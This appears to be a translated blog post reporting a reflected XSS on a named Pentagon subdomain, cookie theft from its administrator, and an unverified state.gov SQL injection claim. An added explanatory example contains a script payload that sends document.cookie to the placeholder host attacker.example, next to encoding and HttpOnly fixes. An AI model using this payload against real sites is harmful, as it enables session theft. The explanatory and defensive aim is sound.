Reflected XSS on the Pentagon Subdomain (and what it led to)
Hackers from the Tunisian Cyber Army and the Al Qaida Electronic Army found a reflected XSS on a Pentagon subdomain, specifically the National Guard subdomain g1arng.army.pentagon.mil/Pages/Default.ASPX .
Using it, they stole the site administrator's cookies and gained access to his mail and several critical files. The attack was carried out with the assistance of Chinese hackers as part of the #opBlackSummer operation.
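To make the attack chain concrete, here is an added example (not code from the original post, and not a reproduction of the actual g1arng.army.pentagon.mil page) showing how a reflected XSS turns into cookie theft, and the two server-side fixes that blunt it: HTML-encoding the reflected value, and marking the session cookie HttpOnly so script cannot read it. The page path, the `q` parameter, and the `attacker.example` host are hypothetical.

```javascript
// Added example, not from the original post. The search page, the `q`
// parameter and attacker.example are placeholders, not the real target.

// Vulnerable: the server copies a query parameter straight into the HTML.
function renderVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Attacker's reflected payload: ships the victim's cookies to a host the
// attacker controls. This is the "steal the admin's cookies" step.
const payload =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Fix 1: HTML-encode untrusted data before placing it in an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

function renderSafe(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Fix 2: an HttpOnly session cookie is invisible to document.cookie, so even
// a successful injection cannot exfiltrate the session this way.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Crude demo check: did the rendered page end up with a live <script> tag?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Demo: the same payload, reflected by the vulnerable and the fixed renderer.
const victimUrl = `https://example.test/search?q=${encodeURIComponent(payload)}`;
const q = new URL(victimUrl).searchParams.get('q');
console.log(containsInjectedScript(renderVulnerable(q))); // true: payload runs
console.log(containsInjectedScript(renderSafe(q)));       // false: shown as text
console.log(sessionCookieHeader('opaque-random-id'));
```

Encoding fixes the injection itself; HttpOnly only limits what a successful injection can reach, so both belong together rather than as alternatives.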
This is not the first time Pentagon sites have suffered at the hands of hackers, yet the reaction of the Pentagon administrators is rather sluggish: Sabari Selvan sent them details of the vulnerability yesterday, but it is still there.
Also, according to unverified reports, as part of the same #opBlackSummer operation the US State Department site, state.gov, was compromised via SQL injection.
At the time of posting, the XSS is still present.
In case anyone missed it, the landmark article about XSS on Habr: